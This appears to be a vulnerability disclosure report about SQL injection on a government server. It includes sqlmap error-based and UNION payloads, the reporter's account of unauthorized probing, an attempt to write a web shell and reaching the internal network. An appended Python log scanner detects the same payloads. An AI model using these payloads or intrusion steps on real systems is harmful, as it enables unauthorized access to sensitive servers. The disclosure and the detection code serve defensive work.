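2015-03-06: Details reported to the vendor; awaiting vendor handling
2015-03-11: Vendor confirmed; details disclosed to the vendor only
2015-03-21: Details disclosed to core white hats and experts in related fields
2015-03-31: Details disclosed to regular white hats
2015-04-10: Details disclosed to trainee white hats
2015-04-20: Details disclosed to the public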
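For testing only; I did not do anything reckless!
I just looked around, then wanted to see whether any injection could be found.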
http://**.**.**/tabled.php?bh=1&lx=wsxf&pass=1
Injection is present.
---
Place: GET
Parameter: pass
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: bh=1&lx=wsxf&pass=1' AND (SELECT 1343 FROM(SELECT COUNT(*),CONCAT(0x7177707871,(SELECT (CASE WHEN (1343=1343) THEN 1 ELSE 0 END)),0x7163797a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'KLbn'='KLbn

    Type: UNION query
    Title: MySQL UNION query (NULL) - 18 columns
    Payload: bh=1&lx=wsxf&pass=1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7177707871,0x41556d48757464686d6e,0x7163797a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
---
web application technology: Apache 2.4.3, PHP 5.4.7
back-end DBMS: MySQL 5.0
Then I found that the database user is root.
Place: GET
Parameter: pass
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: bh=1&lx=wsxf&pass=1' AND (SELECT 1343 FROM(SELECT COUNT(*),CONCAT(0x7177707871,(SELECT (CASE WHEN (1343=1343) THEN 1 ELSE 0 END)),0x7163797a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'KLbn'='KLbn

    Type: UNION query
    Title: MySQL UNION query (NULL) - 18 columns
    Payload: bh=1&lx=wsxf&pass=1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7177707871,0x41556d48757464686d6e,0x7163797a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
---
web application technology: Apache 2.4.3, PHP 5.4.7
back-end DBMS: MySQL 5.0
current user: 'root@localhost'
Opened this link:
http://**.**.**/tabled.php?bh=1
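Found the web path.
Tried writing a shell.
Then it looks like the internal network is reachable.
Right after that, I found that the websites of all the district and county public security bureaus are on this server.
The corresponding directories.
Please don't come after me across provinces.
Severity: High
Vulnerability Rank: 15
Confirmed at: 2015-03-11 10:26
The described situation has been confirmed to exist.
None yet
Handed over to a third-party vendor (a technical support unit of the Ministry of Public Security) for handling.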
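A log-review check for the two probe types in the sqlmap output above (error-based and UNION query against the `pass` parameter), added here as an example and not part of the original report. The Apache combined-log layout, the sample lines, the 192.0.2.x addresses and all function names are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Signatures derived from the two payload types reported on this page.
SIGNATURES = {
    "union_null_probe": re.compile(r"union\s+(all\s+)?select\s+(null\s*,\s*){2,}", re.I),
    "error_based_rand_group": re.compile(r"floor\s*\(\s*rand\s*\(\s*0\s*\)\s*\*\s*2\s*\)", re.I),
    "information_schema": re.compile(r"information_schema\.", re.I),
    "hex_marker_concat": re.compile(r"concat\s*\(\s*0x[0-9a-f]{6,}", re.I),
}

# Assumed Apache combined log format: ip, ident, user, [time], "METHOD target PROTO", status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample lines (not real traffic); payloads are abbreviated from the page.
SAMPLE_LOG = [
    '192.0.2.10 - - [06/Mar/2015:10:00:01 +0800] "GET /tabled.php?bh=1&lx=wsxf&pass=1 HTTP/1.1" 200 5120',
    '192.0.2.77 - - [06/Mar/2015:10:02:13 +0800] "GET /tabled.php?bh=1&lx=wsxf&pass=1%27%20UNION%20ALL'
    '%20SELECT%20NULL%2CNULL%2CNULL%2CCONCAT%280x7177707871%29%2CNULL%23 HTTP/1.1" 200 5301',
    '192.0.2.77 - - [06/Mar/2015:10:02:14 +0800] "GET /tabled.php?bh=1&lx=wsxf&pass=1%27%20AND%20%28SELECT'
    '%201343%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x7177707871%2CFLOOR%28RAND%280%29%2A2%29%29x'
    '%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27KLbn%27%3D%27KLbn'
    ' HTTP/1.1" 200 812',
]

def scan_line(line):
    """Return a finding dict if any decoded query parameter matches a signature, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m["target"])
    hits = {}
    # parse_qsl percent-decodes each value, so encoded payloads are matched in clear form.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        matched = sorted(sig for sig, rx in SIGNATURES.items() if rx.search(value))
        if matched:
            hits[name] = matched
    if not hits:
        return None
    return {"ip": m["ip"], "path": parts.path, "status": int(m["status"]), "hits": hits}

def scan_log(lines):
    """Scan an iterable of access-log lines and return all findings in order."""
    return [f for f in map(scan_line, lines) if f]

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

Hits of this kind show that probing happened; the fix on the application side is a parameterized query for `pass`, and the `root@localhost` result above means the application's database account should also be replaced with a least-privilege one.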